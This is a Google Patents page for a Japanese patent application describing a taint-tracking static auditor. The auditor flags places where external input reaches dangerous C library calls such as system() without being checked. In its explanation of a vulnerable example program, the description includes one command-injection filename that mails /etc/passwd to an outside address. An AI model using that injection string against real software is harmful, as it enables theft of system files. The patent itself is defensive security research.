JPWO2006087780A1 - 脆弱性監査プログラム、脆弱性監査装置、脆弱性監査方法 - Google Patents
脆弱性監査プログラム、脆弱性監査装置、脆弱性監査方法 Download PDFInfo
- Publication number
- JPWO2006087780A1 JPWO2006087780A1 JP2007503520A JP2007503520A JPWO2006087780A1 JP WO2006087780 A1 JPWO2006087780 A1 JP WO2006087780A1 JP 2007503520 A JP2007503520 A JP 2007503520A JP 2007503520 A JP2007503520 A JP 2007503520A JP WO2006087780 A1 JPWO2006087780 A1 JP WO2006087780A1
- Authority
- JP
- Japan
- Prior art keywords
- vulnerability
- variable
- program
- input
- information
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F9/00—Arrangements for program control, e.g. control units
- G06F9/06—Arrangements for program control, e.g. control units using stored programs, i.e. using an internal store of processing equipment to receive or retain programs
- G06F9/44—Arrangements for executing specific programs
- G06F9/445—Program loading or initiating
- G06F9/44589—Program code verification, e.g. Java bytecode verification, proof-carrying code
Landscapes
- Engineering & Computer Science (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Physics & Mathematics (AREA)
- General Engineering & Computer Science (AREA)
- General Physics & Mathematics (AREA)
- Debugging And Monitoring (AREA)
- Stored Programmes (AREA)
Abstract
被監査プログラムの脆弱性を検出する脆弱性監査方法をコンピュータに実行させる脆弱性監査プログラムであって、脆弱性に関する判定ルールを管理する判定ルール管理ステップと、被監査プログラムを読み込むプログラム入力ステップと、値が外部から入力される変数について、被監査プログラムの処理フローの追跡を行い、追跡により変数に関する情報を取得する処理フロー追跡ステップと、変数に関する情報を管理する変数管理ステップと、判定ルールと変数に関する情報を用いて脆弱性の判定を行う脆弱性判定ステップと、脆弱性判定ステップにより検出された脆弱性について警告メッセージを出力する警告出力ステップとをコンピュータに実行させる。
Description
本発明は、プログラムを監査し、脆弱性を検出する脆弱性監査プログラム、脆弱性監査装置、脆弱性監査方法に関するものである。
プログラムに対する脆弱性監査技術は一般に、静的監査と動的監査に大別される。脆弱性とは、悪用されるとシステムダウン、乗っ取り、情報漏洩等、プログラムユーザに被害をもたらすようなバグの一種であり、セキュリティホールとも呼ばれる。
まず、静的監査について説明する。
プログラム言語に用意されたライブラリの中には、脆弱性の元になることから使用してはならないもの、或いは使用に注意を要するものが存在する。これらを脆弱ライブラリと呼ぶ。例えばC言語の場合、最もポピュラーな脆弱性であるバッファオーバフロー脆弱性の元となり得る“strcpy”等のライブラリはつかうべきでなく、代わりに“strncpy”等を使うべきである、と言われている。しかし、実際のソースコードにおいては、これらの規約が徹底されているとはいえない現状がある。
静的監査とは、プログラムの実行を伴わない監査のことである。一般的な静的監査は、ソースコードを読み込み、既知の脆弱ライブラリ名(システム関数なども含む)を検索し、脆弱ライブラリが使用されている位置と共に警告メッセージを出力する。これにより、プログラマがソースコードに脆弱性を作りこまないような支援を行う。
次に、動的監査について説明する。
動的監査とは、プログラムの実行を伴う監査のことである。一般的な動的監査は、メモリなどを監視しながら、プログラムに入力データを与え、ソースコードを1行ずつ実行する。そして、メモリ上で異常が発生した場合、警告メッセージを出力する。
なお、本発明の関連ある従来技術として、例えば、下記に示す特許文献1が知られている。このコンピュータプロセスのリソースのモデル化方法及び装置は、コンピュータプログラムのコンポーネントを解析して、そのコンポーネントがリソースに与える影響を決定する。また、リソースの所定の挙動に対する違反を検知すると、プログラミングエラーとして通知する。
特表平10−509258号公報
一般に脆弱とされているライブラリでも、プログラマがソースコード中での使い方さえ誤らなければ、脆弱性を作りこむことはない。例えば、“strcpy”ライブラリが文字列定数を処理するのであれば、脆弱性とはなりえない。一方、“strcpy”ライブラリが、プログラムのユーザ等、外部から与えられた文字列を処理する場合、外部から特殊な文字列を与えることでバッファオーバフロー脆弱性が発生しうる。
しかしながら、従来の静的監査は、脆弱なライブラリ名の単純なパターンマッチングに依るものが多く、ソースコード中で使用されている脆弱ライブラリの全てについて警告メッセージを出力する。すなわち、従来の静的監査は適切に使われている脆弱ライブラリについても警告するため、プログラマは膨大な警告メッセージに対処しなければならない。
また、従来の動的監査は、監査者が、プログラムに与える入力データのセットであるテストセットを作る必要がある。様々な脆弱性を網羅するようにテストセットを作ることは、一般に困難且つ高コストであり、このことが動的監査の敷居を高くしている。
本発明は上述した問題点を解決するためになされたものであり、脆弱なライブラリが適切に用いられていない箇所のみを検出する脆弱性監査プログラム、脆弱性監査装置、脆弱性監査方法を提供することを目的とする。
上述した課題を解決するため、本発明は、被監査プログラムの脆弱性を検出する脆弱性監査方法をコンピュータに実行させる脆弱性監査プログラムであって、脆弱性に関する判定ルールを管理する判定ルール管理ステップと、前記被監査プログラムを読み込むプログラム入力ステップと、値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡ステップと、前記変数に関する情報を管理する変数管理ステップと、前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定ステップと、前記脆弱性判定ステップにより検出された脆弱性について警告メッセージを出力する警告出力ステップとをコンピュータに実行させるものである。
また、本発明に係る脆弱性監査プログラムにおいて、前記判定ルールは、ライブラリ関数における脆弱な引数の定義を含むことを特徴とするものである。
また、本発明に係る脆弱性監査プログラムにおいて、前記変数管理ステップにより管理される変数は、前記値が外部から入力される変数と、前記値が外部から入力される変数が関数等で処理された結果の変数を含むことを特徴とするものである。
また、本発明に係る脆弱性監査プログラムにおいて、前記変数に関する情報は、値が外部から入力されるものであるか否かの情報、外部から入力された値について脆弱性のチェックを行ったか否かの情報を含むことを特徴とするものである。
また、本発明に係る脆弱性監査プログラムにおいて、前記警告メッセージは、前記値が外部から入力される変数の位置、使用されたライブラリ関数と引数、使用されたライブラリ関数の位置、検出された脆弱性の説明、前記被監査プログラムの修正方法のいずれかを含むことを特徴とするものである。
また、本発明に係る脆弱性監査プログラムにおいて、前記被監査プログラムは、ソースコードまたは中間言語ファイルであることを特徴とするものである。
また、本発明は、被監査プログラムの脆弱性を検出する脆弱性監査方法をコンピュータに実行させる脆弱性監査プログラムであって、脆弱性に関する判定ルールを管理する判定ルール管理ステップと、前記被監査プログラムを読み込むプログラム入力ステップと、値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡ステップと、前記変数に関する情報を管理する変数管理ステップと、前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定ステップと、前記脆弱性判定ステップにより判定された脆弱性について前記被監査プログラムの修正を行う修正出力ステップとをコンピュータに実行させるものである。
また、本発明は、被監査プログラムの脆弱性を検出する脆弱性監査装置であって、脆弱性に関する判定ルールを管理する判定ルール管理部と、前記被監査プログラムを読み込むプログラム入力部と、値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡部と、前記変数に関する情報を管理する変数管理部と、前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定部と、前記脆弱性判定部により判定された脆弱性について警告メッセージを出力する警告出力部とを備えたものである。
また、本発明に係る脆弱性監査装置において、前記判定ルールは、ライブラリ関数における脆弱な引数の定義を含むことを特徴とするものである。
また、本発明に係る脆弱性監査装置において、前記変数管理部により管理される変数は、前記値が外部から入力される変数と、前記値が外部から入力される変数が関数等で処理された結果の変数を含むことを特徴とするものである。
また、本発明に係る脆弱性監査装置において、前記変数に関する情報は、値が外部から入力されるものであるか否かの情報、外部から入力された値について脆弱性のチェックを行ったか否かの情報を含むことを特徴とするものである。
また、本発明に係る脆弱性監査装置において、前記警告メッセージは、前記値が外部から入力される変数の位置、使用されたライブラリ関数と引数、使用されたライブラリ関数の位置、検出された脆弱性の説明、前記被監査プログラムの修正方法のいずれかを含むことを特徴とするものである。
また、本発明に係る脆弱性監査装置において、前記被監査プログラムは、ソースコードまたは中間言語ファイルであることを特徴とするものである。
また、本発明は、被監査プログラムの脆弱性を検出する脆弱性監査装置であって、脆弱性に関する判定ルールを管理する判定ルール管理部と、前記被監査プログラムを読み込むプログラム入力部と、値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡部と、前記変数に関する情報を管理する変数管理部と、前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定部と、前記脆弱性判定部により判定された脆弱性について前記被監査プログラムの修正を行う修正出力部とを備えたものである。
また、本発明は、被監査プログラムの脆弱性を検出する脆弱性監査方法であって、脆弱性に関する判定ルールを管理する判定ルール管理ステップと、前記被監査プログラムを読み込むプログラム入力ステップと、値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡ステップと、前記変数に関する情報を管理する変数管理ステップと、前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定ステップと、前記脆弱性判定ステップにより判定された脆弱性について警告を出力する警告出力ステップとを実行するものである。
また、本発明は、被監査プログラムの脆弱性を検出する脆弱性監査方法であって、脆弱性に関する判定ルールを管理する判定ルール管理ステップと、前記被監査プログラムを読み込むプログラム入力ステップと、値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡ステップと、前記変数に関する情報を管理する変数管理ステップと、前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定ステップと、前記脆弱性判定ステップにより判定された脆弱性について前記被監査プログラムの修正を行う修正出力ステップとを実行するものである。
以下、本発明の実施の形態について図面を参照しつつ説明する。
本発明は、外部データの入力を起点としてデータフローを追跡し、外部データをそのまま危険なライブラリに引き渡している個所を検出するものである。従って、本発明によれば、脆弱なライブラリが適切に用いられていない箇所のみを検出できる。本実施の形態では、C言語のソースコードに含まれる脆弱性を検出し、検出した脆弱性をプログラマに警告するような脆弱性監査装置について説明する。
まず、監査の対象となるプログラムである、2つの被監査プログラムの例について説明する。
第1の被監査プログラムの例として、脆弱なプログラム“test1.c”を図1に示す。“test1.c”は、ユーザにファイル名の入力を行わせ、このファイル名に対応するファイルの詳細情報(アクセス制限、所有者、サイズ、最終更新日時、等)を画面に出力するプログラムである。“test1.c”はまず、09〜11行目でファイル名の入力処理を行う。次に、13行目で当該ファイル名を用いてUnix(登録商標)シェルに渡すコマンド文字列を生成する。ここでは“ls −l filename”で、ファイルの詳細情報を出力する。次に、14行目で当該コマンド文字列をUnix(登録商標)シェルに引き渡す。このプログラムに既存の適切なファイル名を入力した場合の、正常な実行結果を図2に示す。
しかし、“test1.c”は悪用される恐れのある脆弱なプログラムである。悪意あるユーザは、ファイル名として例えば“example.txt; mail foo@fuga.com < /etc/passwd”を入力するかもしれない。この場合、“test1.c”は、ファイル“example.txt”の詳細情報が表示されるところまでは良いが、続けてパスワードファイルを“foo@fuga.com”宛てにメール送信するコマンドが実行されてしまう。すなわち、機密情報が漏洩してしまう。
次に、第2の被監査プログラムの例として、“test1.c”の問題を解決した安全なプログラム“test2.c”を図3に示す。“test1.c”と違って“test2.c”は、入力されたファイル名をチェックする。13行目で関数“Check_file_name”(23〜36行目で定義されている)が呼び出され、そこでファイル名がチェックされ、チェックにパスしないファイル名は処理せずにプログラムを終了する。これにより、“test1.c”のような問題は発生しないことになる。
ここで、関数“Check_file_name”について簡単に説明する。この関数は、ファイル名の文字列に英数字、‘.’(ピリオド)、‘−’(ハイフン)、‘_’(アンダーバー)以外の文字が含まれていないかをチェックしている。通常、これらの文字で必要十分と考えられる。すなわち、ファイル名に使える文字をこれらに限定することにより、“test1.c”の問題のような不正な入力を防ぐ。
次に、本発明に係る脆弱性監査装置の構成について説明する。図4は、本発明に係る脆弱性監査装置の構成の一例を示すブロック図である。この脆弱性監査装置は、プログラム入力部11、変数管理部21、判定ルール管理部22、処理フロー追跡部31、脆弱性判定部32、警告メッセージ出力部41を備える。
判定ルール管理部22は、予め定義された脆弱性についての判定ルールを管理する。判定ルールは、外部入力を用いる関数や脆弱ライブラリの引数等を記述したものである。また、判定ルールは、予めメモリに格納されても良いし、予めファイルに格納され起動時に読み込むようにしても良い。また、ユーザがこのファイルをカスタマイズできるようにしても良い。
プログラム入力部11は、ソースコードを読み込み、ソースコードの構文解析を行い、処理フローを処理フロー追跡部31に渡す。これは、C言語コンパイラの機能を利用して実現できる。C言語コンパイラはソースコードを構文解析して中間言語ファイルを生成するため、この中間言語ファイルを処理フローとする。ソースコードは複数のファイルからなるものでも良い。処理フロー追跡部31は、値が外部から入力される変数である外部入力変数を抽出し、その変数に関する情報を変数管理部21へ渡す。また、処理フロー追跡部31は、外部入力変数を処理フローに沿って追跡し、追跡した先の変数がライブラリ関数の脆弱な引数として処理されている箇所を抽出する。抽出の基準には、判定ルールを用いる。
変数管理部21は、処理フロー追跡部31から得られる変数毎の情報を変数テーブルとして管理する。変数毎の情報は、変数名、属性、属性が設定された位置(ソースファイル名と行番号)からなる。引数や変数の属性には、変数宣言直後の状態である「未設定」、値が設定された状態であり、他のどの状態でもない「通常」、外部入力された状態であり、脆弱性が発生し得る「汚染」、汚染でないことをチェックした「チェック済み」がある。また、属性が汚染である変数を汚染変数と呼ぶ。
脆弱性判定部32は、判定ルールに定義された脆弱なライブラリの引数として、汚染変数が使用されているか否かの判定を行う。警告出力部41は、脆弱性に関する警告メッセージを生成し、画面やファイル等に出力する。
次に、本発明に係る脆弱性監査装置の動作について説明する。図5は、本発明に係る脆弱性監査装置の動作の一例を示すフローチャートである。
まず、プログラム入力部11、プログラムを読み込み、処理フロー追跡部31へ渡す(S11)。次に、処理フロー追跡部31は、判定ルールに従って外部入力変数を抽出し、変数管理部21の変数テーブルに格納する(S12)。次に、処理フロー追跡部31は、未監査の変数が残っているか否かの判断を行う(S13)。未監査の変数が残っていれば(S13,Y)、処理フロー追跡部31は、未監査の変数の1つを選択して変数の監査を行い(S14)、処理S13へ戻る。一方、未監査の変数が残っていなければ(S13,N)、このフローを終了する。
処理S14において、処理フロー追跡部31と脆弱性判定部32は、選択した変数の監査を行う。図6は、本発明に係る変数の監査の動作の一例を示すフローチャートである。
まず、処理フロー追跡部31は、読み込んだプログラムを1行進める(S21)。次に、処理フロー追跡部31は、プログラムが終了したか否かの判断を行う(S22)。プログラムが終了した場合(S22,Y)、このフローを終了する。一方、プログラムが終了していない場合(S22,N)、処理フロー追跡部31は、プログラムが分岐したか否かの判断を行う(S23)。プログラムが分岐していない場合(S23,N)、処理S31へ移行する。一方、プログラムが分岐した場合(S23,Y)、処理フロー追跡部31は、選択した変数に対応する分岐先の変数を変数テーブルに格納する(S24)。
次に、処理フロー追跡部31は、当該変数の属性がチェック済みであるか否かの判断を行う(S31)。チェック済みである場合(S31,Y)、このフローを終了する。一方、チェック済みでない場合(S31,N)、処理フロー追跡部31は、当該変数が関数に使用されているか否かの判断を行う(S32)。関数に使用されていなければ(S32,N)、処理S21へ戻る。一方、関数に使用されていれば(S32,Y)、脆弱性判定部32は、各変数の属性の遷移により汚染変数が発生したか否かの判断を行う(S41)、汚染変数が発生していなければ(S41,N)、処理S43へ移行する。一方、汚染変数が発生していれば(S41,Y)、脆弱性判定部32は、変数の属性を汚染として変数テーブルに格納する(S42)。次に、脆弱性判定部32は、判定ルールに従って当該変数に脆弱性が発生したか否かの判断を行う(S43)。脆弱性が発生していない場合(S43,N)、処理S21へ戻る。一方、脆弱性が発生した場合(S43,Y)、警告出力部41は、警告メッセージの出力を行い(S44)、このフローを終了する。
ここで、処理S12は、予め定義した外部入力を用いる関数の使用と、main関数へ渡された引数(argc,argv)により、外部入力変数を抽出する。このうち外部入力を用いる関数については、関数名と、汚染された値が入り得る引数の位置を、予め判定ルールに定義しておく。この定義は、各関数の使用を踏まえて行う必要がある。例えばfgets関数について、以下のように予め定義しておく。
fgets:param_1=taint
この定義は、fgets関数が外部から入力される値が第1引数に入るような使用であることから、第1引数が汚染(taint)であり、それ以外の引数及び復帰値は非汚染であることを意味している。
同様にsnprintf関数について、以下のように予め定義しておく。
snprintf:param_1=param_4
この定義は、snprintf関数において第1引数の属性が第4引数の属性を引き継ぐことを意味している。つまり、第4引数が汚染であれば、第1引数も汚染となり、第4引数が非汚染であれば、第1引数も非汚染となる。
同様にsystem関数について、以下のように予め定義しておく。
system:alert_if param_1=taint
この定義は、system関数において第1引数が汚染である場合に警告メッセージを生成することを意味している。すなわち、この関数は、第1引数が汚染である場合に異常な挙動を示す恐れがあり、脆弱性を有することを表す。
また、処理S31は、変数の属性がチェック済みか否かのチェックを行う。例えば、対象となる変数を引数としてisalnum()等のチェック関数をコールすると、対象となる変数の属性はチェック済みとなる。また、対象となる変数が比較演算子を含む条件式に用いられると、対象となる変数の属性はチェック済みとなる。
また、処理S44は、脆弱性に関する警告メッセージを生成し、画面やファイル等に出力する。図7は、本発明に係る警告メッセージの一例を示す図である。警告メッセージとしてまず、検出番号、関数名、引数位置が出力される。関数名、危険度、脅威、解説、等の脆弱性に関する説明は、予め判定ルール中に定義され、検出された脆弱性のIDに対応づけられている。汚染されたデータの設定箇所は、変数テーブルに格納されており、設定した関数名、ファイル名、行番号等が出力される。脆弱ライブラリの使用箇所は、フロー追跡の現在位置から得られ、使用した関数名、ファイル名、行番号等が出力される。
次に、本発明に係る脆弱性監査装置が、脆弱なプログラムの脆弱性監査を行う場合と、安全なプログラムの脆弱性監査を行う場合について、動作の具体例を説明する。
まず、脆弱性監査装置が、脆弱なプログラム“test1.c”の脆弱性監査を行う場合について説明する。
まず、脆弱性監査装置は、10行目でfgets関数が使用されていることから、変数file_nameに外部から値が入力され、変数file_nameの属性が汚染である可能性がある、と判断する。
次に、脆弱性監査装置は、13行目でsnprintf関数が使用されていることから、変数ls_commandに変数file_nameの属性が引き継がれ、変数ls_commandの属性が汚染である可能性がある、と判断する。
次に、脆弱性監査装置は、14行目でsystem関数の引数として変数ls_commandが使用されていることから、system関数が汚染変数を処理しており、脆弱性を発生する可能性がある、と判断する。次に、脆弱性監査装置は、検出した脆弱性について警告メッセージを出力する。
次に、脆弱性監査装置が、安全なプログラム“test2.c”の脆弱性監査を行う場合について説明する。
まず、脆弱性監査装置は、10行目でfgets関数が使用されていることから、変数file_nameに外部から値が入力され、変数file_nameの属性が汚染である、と判断する。
次に、脆弱性監査装置は、13行目で関数Check_file_nameにより変数file_nameが値をチェックされており、変数file_nameの属性がチェック済みである、と判断する。
次に、脆弱性監査装置は、18行目でsnprintf関数が使用されていることから、変数ls_commandに変数file_nameの属性が引き継がれ、変数ls_commandの属性がチェック済みである、と判断する。
次に、脆弱性監査装置は、19行目でsystem関数の引数として変数ls_commandが使用されていることから、system関数がチェック済みの属性を持つ変数を処理しており、脆弱性を発生する可能性がない、と判断する。
なお、本実施の形態においては、1つの変数に対して検出された警告メッセージを1つずつ出力していたが、同一の変数に対する複数の警告メッセージをマージしても良い。プログラムにおいてif文等により処理が分岐しており、分岐先で同じ変数に対して異なる処理が施される場合がよくある。このような場合において、例えば、片方の分岐先では危険度の高い脆弱性が検出され、もう片方の分岐先では危険度の低い脆弱性が検出されることがある。このとき、両者を別の警告メッセージとして出力することはユーザにとって冗長であり、両者をマージした警告メッセージとして出力する方が望ましいことが多い。警告メッセージのマージの具体的な方法としては、複数の警告メッセージの中で最も危険度の高い警告メッセージのみを残し、他の警告メッセージを捨てる方法がある。
また、本実施の形態においては、ソースコードを処理することにより脆弱性監査を行うが、中間言語ファイルを処理することにより脆弱性監査を行ってもよい。C言語のプログラムにおいては、人間にとって可読性のあるソースコードをコンパイルすることにより、コンピュータが実行可能な機械語に翻訳される。コンパイラは、この翻訳の過程で中間的なファイルである中間言語ファイルを生成しており、これをディスクに出力することもできる。中間言語ファイルは、ソースコードを単位毎にノードの形で表したものであり、人間にとってソースコードのような可読性はないが、機械語ほど解読が困難なものではない。図8は、中間言語ファイルの一例を示す図である。このような中間言語ファイルを読み込んだ場合、脆弱性監査装置は木構造のデータフローを生成することができる。データの形式は異なるが、ソースコードと同様にして脆弱性監査の処理を行うことができる。
また、本実施の形態においては、脆弱性監査装置が警告メッセージを出力することにより、ユーザが警告メッセージに従ってプログラムの修正を行うことを目的としたが、警告メッセージにプログラム修正方法を含めても良いし、新たに備える修正出力部がプログラム修正方法に従って自動的にプログラムを修正しても良い。図9は、本発明に係る脆弱性監査装置の構成の別の一例を示すブロック図である。図9において、図4と同一符号は図4に示された対象と同一又は相当物を示しており、ここでの説明を省略する。また、図4と比較すると図9の装置は、警告出力部41の代わりに修正出力部51を備えることにより、自動的にプログラムを修正する。
このようにプログラム修正方法を得る場合、判定ルールにおいて、更に脆弱性に対するプログラム修正方法を予め定義しておく。例えば、まず、system関数の判定ルールにおいてフィールドを1つ追加し、以下のようなプログラム修正方法の種類を記述する。
system:alert_if param1=taint,correct=method3
更に、判定ルールにおいてプログラム修正方法method3の内容を予め定義しておく。図10は、本発明に係るプログラム修正方法の内容の一例を示すソースコードである。このプログラム修正方法method3は、system関数を使用する直前に、その引数として使用される文字列変数をチェックするロジックを挿入するものである。このロジックは文字列変数において、‘|’や‘;’等、シェルに引き渡されると危険である文字が含まれているか否かをチェックするものである。ここで、Invalid_String_Error(x)は、別の箇所で定義される関数であり、エラーを出力してプログラムを終了させるものである。
また、本実施の形態においては、C言語を対象としたが、他のプログラム言語についても適用可能である。
更に、脆弱性監査装置を構成するコンピュータに上述した各ステップを実行させるプログラムを、脆弱性監査プログラムとして提供することができる。上述したプログラムは、コンピュータにより読取り可能な記録媒体に記憶させることによって、脆弱性監査装置を構成するコンピュータに実行させることが可能となる。ここで、上記コンピュータにより読取り可能な記録媒体としては、CD−ROMやフレキシブルディスク、DVDディスク、光磁気ディスク、ICカード等の可搬型記憶媒体や、コンピュータプログラムを保持するデータベース、或いは、他のコンピュータ並びにそのデータベースや、更に回線上の伝送媒体をも含むものである。
本発明によれば、脆弱なライブラリが適切に用いられていない箇所のみを検出することにより、脆弱なライブラリを全て検出する従来の方法に比べ、脆弱性検出の精度が大幅に向上する。
Claims (16)
- 被監査プログラムの脆弱性を検出する脆弱性監査方法をコンピュータに実行させる脆弱性監査プログラムであって、
脆弱性に関する判定ルールを管理する判定ルール管理ステップと、
前記被監査プログラムを読み込むプログラム入力ステップと、
値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡ステップと、
前記変数に関する情報を管理する変数管理ステップと、
前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定ステップと、
前記脆弱性判定ステップにより検出された脆弱性について警告メッセージを出力する警告出力ステップと、
をコンピュータに実行させることを特徴とする脆弱性監査プログラム。 - 請求項1に記載の脆弱性監査プログラムにおいて、
前記判定ルールは、ライブラリ関数における脆弱な引数の定義を含むことを特徴とする脆弱性監査プログラム。 - 請求項1に記載の脆弱性監査プログラムにおいて、
前記変数管理ステップにより管理される変数は、前記値が外部から入力される変数と、前記値が外部から入力される変数が関数等で処理された結果の変数を含むことを特徴とする脆弱性監査プログラム。 - 請求項1に記載の脆弱性監査プログラムにおいて、
前記変数に関する情報は、値が外部から入力されるものであるか否かの情報、外部から入力された値について脆弱性のチェックを行ったか否かの情報を含むことを特徴とする脆弱性監査プログラム。 - 請求項1に記載の脆弱性監査プログラムにおいて、
前記警告メッセージは、前記値が外部から入力される変数の位置、使用されたライブラリ関数と引数、使用されたライブラリ関数の位置、検出された脆弱性の説明、前記被監査プログラムの修正方法のいずれかを含むことを特徴とする脆弱性監査プログラム。 - 請求項1に記載の脆弱性監査プログラムにおいて、
前記被監査プログラムは、ソースコードまたは中間言語ファイルであることを特徴とする脆弱性監査プログラム。 - 被監査プログラムの脆弱性を検出する脆弱性監査方法をコンピュータに実行させる脆弱性監査プログラムであって、
脆弱性に関する判定ルールを管理する判定ルール管理ステップと、
前記被監査プログラムを読み込むプログラム入力ステップと、
値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡ステップと、
前記変数に関する情報を管理する変数管理ステップと、
前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定ステップと、
前記脆弱性判定ステップにより判定された脆弱性について前記被監査プログラムの修正を行う修正出力ステップと、
をコンピュータに実行させる脆弱性監査プログラム。 - 被監査プログラムの脆弱性を検出する脆弱性監査装置であって、
脆弱性に関する判定ルールを管理する判定ルール管理部と、
前記被監査プログラムを読み込むプログラム入力部と、
値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡部と、
前記変数に関する情報を管理する変数管理部と、
前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定部と、
前記脆弱性判定部により判定された脆弱性について警告メッセージを出力する警告出力部と、
を備えてなる脆弱性監査装置。 - 請求項8に記載の脆弱性監査装置において、
前記判定ルールは、ライブラリ関数における脆弱な引数の定義を含むことを特徴とする脆弱性監査装置。 - 請求項8に記載の脆弱性監査装置において、
前記変数管理部により管理される変数は、前記値が外部から入力される変数と、前記値が外部から入力される変数が関数等で処理された結果の変数を含むことを特徴とする脆弱性監査装置。 - 請求項8に記載の脆弱性監査装置において、
前記変数に関する情報は、値が外部から入力されるものであるか否かの情報、外部から入力された値について脆弱性のチェックを行ったか否かの情報を含むことを特徴とする脆弱性監査装置。 - 請求項8に記載の脆弱性監査装置において、
前記警告メッセージは、前記値が外部から入力される変数の位置、使用されたライブラリ関数と引数、使用されたライブラリ関数の位置、検出された脆弱性の説明、前記被監査プログラムの修正方法のいずれかを含むことを特徴とする脆弱性監査装置。 - 請求項8に記載の脆弱性監査装置において、
前記被監査プログラムは、ソースコードまたは中間言語ファイルであることを特徴とする脆弱性監査装置。 - 被監査プログラムの脆弱性を検出する脆弱性監査装置であって、
脆弱性に関する判定ルールを管理する判定ルール管理部と、
前記被監査プログラムを読み込むプログラム入力部と、
値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡部と、
前記変数に関する情報を管理する変数管理部と、
前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定部と、
前記脆弱性判定部により判定された脆弱性について前記被監査プログラムの修正を行う修正出力部と、
を備えてなる脆弱性監査装置。 - 被監査プログラムの脆弱性を検出する脆弱性監査方法であって、
脆弱性に関する判定ルールを管理する判定ルール管理ステップと、
前記被監査プログラムを読み込むプログラム入力ステップと、
値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡ステップと、
前記変数に関する情報を管理する変数管理ステップと、
前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定ステップと、
前記脆弱性判定ステップにより判定された脆弱性について警告を出力する警告出力ステップと、
を実行する脆弱性監査方法。 - 被監査プログラムの脆弱性を検出する脆弱性監査方法であって、
脆弱性に関する判定ルールを管理する判定ルール管理ステップと、
前記被監査プログラムを読み込むプログラム入力ステップと、
値が外部から入力される変数について、前記被監査プログラムの処理フローの追跡を行い、該追跡により変数に関する情報を取得する処理フロー追跡ステップと、
前記変数に関する情報を管理する変数管理ステップと、
前記判定ルールと前記変数に関する情報を用いて脆弱性の判定を行う脆弱性判定ステップと、
前記脆弱性判定ステップにより判定された脆弱性について前記被監査プログラムの修正を行う修正出力ステップと、
を実行する脆弱性監査方法。
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| PCT/JP2005/002422 WO2006087780A1 (ja) | 2005-02-17 | 2005-02-17 | 脆弱性監査プログラム、脆弱性監査装置、脆弱性監査方法 |
Related Child Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| JP2011048514A Division JP5077455B2 (ja) | 2011-03-07 | 2011-03-07 | 脆弱性監査プログラム、脆弱性監査装置、脆弱性監査方法 |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| JPWO2006087780A1 true JPWO2006087780A1 (ja) | 2008-07-03 |
Family
ID=36916196
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| JP2007503520A Pending JPWO2006087780A1 (ja) | 2005-02-17 | 2005-02-17 | 脆弱性監査プログラム、脆弱性監査装置、脆弱性監査方法 |
Country Status (3)
| Country | Link |
|---|---|
| US (1) | US20070271617A1 (ja) |
| JP (1) | JPWO2006087780A1 (ja) |
| WO (1) | WO2006087780A1 (ja) |
Families Citing this family (24)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US7665119B2 (en) | 2004-09-03 | 2010-02-16 | Secure Elements, Inc. | Policy-based selection of remediation |
| US7757282B2 (en) * | 2005-05-20 | 2010-07-13 | Microsoft Corporation | System and method for distinguishing safe and potentially unsafe data during runtime processing |
| JP4693044B2 (ja) * | 2005-08-18 | 2011-06-01 | 株式会社日立ソリューションズ | ソースコード脆弱性検査装置 |
| US8510827B1 (en) * | 2006-05-18 | 2013-08-13 | Vmware, Inc. | Taint tracking mechanism for computer security |
| US7991902B2 (en) * | 2006-12-08 | 2011-08-02 | Microsoft Corporation | Reputation-based authorization decisions |
| JP5176478B2 (ja) * | 2007-10-22 | 2013-04-03 | 富士通株式会社 | データフロー解析装置、データフロー解析方法およびデータフロー解析プログラム |
| US8429633B2 (en) * | 2008-11-21 | 2013-04-23 | International Business Machines Corporation | Managing memory to support large-scale interprocedural static analysis for security problems |
| US8387017B2 (en) * | 2009-09-03 | 2013-02-26 | International Business Machines Corporation | Black box testing optimization using information from white box testing |
| US8819637B2 (en) | 2010-06-03 | 2014-08-26 | International Business Machines Corporation | Fixing security vulnerability in a source code |
